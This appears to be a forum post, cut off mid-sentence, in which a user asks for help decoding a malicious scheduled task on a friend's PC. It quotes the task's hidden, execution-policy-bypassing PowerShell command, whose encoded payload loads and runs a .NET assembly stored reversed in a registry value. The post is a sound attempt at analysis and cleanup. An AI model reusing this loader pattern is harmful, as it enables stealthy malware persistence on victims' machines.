Malware opening Powershell every minute. Can any one please decode and analyse this

Hi,My friend complained that some blank window is opening frequently.Initially i searched with Malwarebytes and it found some malware and mining scripts, i deleted them and re started PC but still powershell is opening automatically every minute. Nothing in startup.

I found a malware in task scheduler.

It is running "C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" every minuteWith these arguments

`-WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAagBhAGsAZQBmAFwAKQAuAGcAZgBmAGYAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=`

I tried to decrypt using base64 ~~but didnt work~~ (working if i use UTF16-LE to decode).

I …

decode found malware malwarebytes mining powershell scheduler scripts startup task task scheduler window